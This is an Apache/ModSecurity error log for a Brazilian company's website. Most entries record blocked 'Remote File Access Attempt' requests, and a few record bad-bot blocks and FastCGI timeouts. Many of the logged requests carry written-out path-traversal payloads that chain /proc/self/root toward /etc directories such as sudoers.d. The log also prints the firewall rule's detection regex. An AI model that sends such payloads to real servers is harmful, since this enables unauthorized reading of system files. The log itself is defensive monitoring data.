[Tue Mar 17 20:29:58.242642 2026] [:error] [pid 11088:tid 140411741927168] [client 74.7.241.31:44250] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnj9mmqtCojLHvu5cKOCQAAAIA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:30:06.145819 2026] [proxy_fcgi:error] [pid 2598:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:49626] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:30:28.129251 2026] [proxy_fcgi:error] [pid 7004:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:50264] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:30:49.129776 2026] [proxy_fcgi:error] [pid 11816:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:50828] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:30:52.021461 2026] [:error] [pid 17653:tid 140411741927168] [client 74.7.243.128:57754] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnkLMdf6f5d65gmYZRhfAAAAsA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:31:10.094201 2026] [proxy_fcgi:error] [pid 16784:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:51452] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:31:17.431065 2026] [:error] [pid 16449:tid 140411708356352] [client 74.7.243.128:44810] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnkRUeQbjTSjgbmHFr08wAAAAQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:31:21.079941 2026] [:error] [pid 17653:tid 140411599251200] [client 74.7.243.128:55842] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnkScdf6f5d65gmYZRhgAAAAtE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:31:33.129793 2026] [proxy_fcgi:error] [pid 26799:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:52174] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:31:55.137803 2026] [proxy_fcgi:error] [pid 16784:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:52616] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:32:09.024660 2026] [:error] [pid 31803:tid 140411683178240] [client 74.7.241.31:36082] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnkeeyqAr6etmhZHNpLkQAAAEc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/run/initramfs/state/etc
[Tue Mar 17 20:32:17.078098 2026] [proxy_fcgi:error] [pid 16784:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:53016] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:32:39.101878 2026] [proxy_fcgi:error] [pid 11088:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:53434] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:32:39.535793 2026] [:error] [pid 2598:tid 140411683178240] [client 74.7.241.31:33980] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnklxj0p0SRWAqcjGGehQAAAwc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:32:42.707901 2026] [:error] [pid 26799:tid 140411557287680] [client 74.7.241.31:37598] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnkmta6ubjKNq_cu4YrfAAAA1Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:32:45.183881 2026] [:error] [pid 16449:tid 140411741927168] [client 74.7.244.43:56254] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abnknUeQbjTSjgbmHFr1EwAAAAA"]
[Tue Mar 17 20:32:56.666007 2026] [:error] [pid 29151:tid 140411632822016] [client 74.7.228.61:52762] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abnkqPPqhzTj3BvfDX-tKgAAAc0"]
[Tue Mar 17 20:33:00.093877 2026] [proxy_fcgi:error] [pid 16449:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:53822] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:33:10.878322 2026] [:error] [pid 19507:tid 140411632822016] [client 74.7.243.128:55006] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnkttY0UrI5A3LftIwkawAAAY0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 20:33:15.613216 2026] [:error] [pid 16449:tid 140411607643904] [client 74.7.243.128:39682] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnku0eQbjTSjgbmHFr1HAAAABA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 20:33:21.069919 2026] [proxy_fcgi:error] [pid 25836:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:54170] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:33:21.825406 2026] [:error] [pid 17653:tid 140411624429312] [client 74.7.243.128:39694] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnkwcdf6f5d65gmYZRhogAAAs4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 20:33:24.474300 2026] [:error] [pid 26799:tid 140411716749056] [client 74.7.241.31:37600] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnkxNa6ubjKNq_cu4YrlwAAA0M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:33:30.389813 2026] [:error] [pid 11816:tid 140411590858496] [client 74.7.241.31:33954] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnkyuw_le52K8_3pV1xYgAAAhI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:33:32.953965 2026] [:error] [pid 11816:tid 140411616036608] [client 74.7.243.128:43314] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnkzOw_le52K8_3pV1xaAAAAg8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:33:42.097814 2026] [proxy_fcgi:error] [pid 2598:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:54516] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:34:04.121826 2026] [proxy_fcgi:error] [pid 11088:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:54812] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:34:22.300176 2026] [:error] [pid 31803:tid 140411582465792] [client 74.7.243.128:56970] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnk_uyqAr6etmhZHNpLwQAAAFM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 20:34:30.033838 2026] [proxy_fcgi:error] [pid 26799:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:55200] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:34:44.781481 2026] [:error] [pid 19507:tid 140411666392832] [client 74.7.243.128:37136] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnlFNY0UrI5A3LftIwkkwAAAYk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 20:34:53.105928 2026] [proxy_fcgi:error] [pid 17653:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:55478] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:34:58.143479 2026] [:error] [pid 2598:tid 140411733534464] [client 74.7.241.31:48028] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnlIhj0p0SRWAqcjGGe2wAAAwE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:35:18.375576 2026] [:error] [pid 25836:tid 140411574073088] [client 74.7.241.31:48248] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/.updated"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnlNoh-PF_25v4hFRCPUAAAARQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:35:19.690669 2026] [:error] [pid 16449:tid 140411674785536] [client 74.7.241.31:55516] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnlN0eQbjTSjgbmHFr1OwAAAAg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:35:20.965891 2026] [:error] [pid 11088:tid 140411683178240] [client 74.7.241.31:55532] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnlOGmqtCojLHvu5cKORgAAAIc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:35:21.126956 2026] [proxy_fcgi:error] [pid 31803:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:55986] AH01075: Error dispatching request to : (polling)
